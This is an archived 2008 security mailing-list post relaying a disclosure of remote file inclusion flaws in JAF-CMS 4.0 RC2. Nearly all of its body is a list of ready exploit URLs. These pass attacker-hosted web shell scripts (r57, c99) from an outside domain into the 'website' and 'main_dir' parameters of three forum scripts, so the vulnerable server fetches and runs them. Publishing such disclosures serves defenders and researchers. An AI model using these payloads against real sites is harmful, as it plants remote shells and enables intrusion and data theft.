Re: JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities

From: str0ke <str0ke@xxxxxxxxxxx>
Date: Thu, 27 Mar 2008 11:42:51 -0500

Original author:

CraCkEr

Original advisory
http://milw0rm.com/exploits/5317

/str0ke

r57blg@xxxxxxxxx wrote:

JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities

[+] Author : XxX

[+] Site : www.wikipediatr.com

==============================================

Exploit : http://localhost/path/module/forum/forum.php?website=http://www.r57shell.in/r57.txt?
http://localhost/path/module/forum/forum.php?main_dir=http://www.r57shell.in/c99.txt? http://localhost/path/module/forum/headlines.php?website=http://www.r57shell.in/erne.txt?
http://localhost/path/module/forum/headlines.php?main_dir=http://www.r57shell.in/r57.txt?
http://localhost/path/module/forum/main.php?website=http://www.r57shell.in/c99.txt?
http://localhost/path/module/forum/main.php?main_dir=http://www.r57shell.in/erne.txt?

References:
- JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities
  - From: r57blg

Prev by Date: [SECURITY] [DSA 1531-1] New policyd-weight packages fix insecure temporary files
Next by Date: Re: [securityreason] *BSD libc (strfmon) Multiple vulnerabilities
Previous by thread: JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities
Next by thread: [SECURITY] [DSA 1531-1] New policyd-weight packages fix insecure temporary files
Index(es):
- Date
- Thread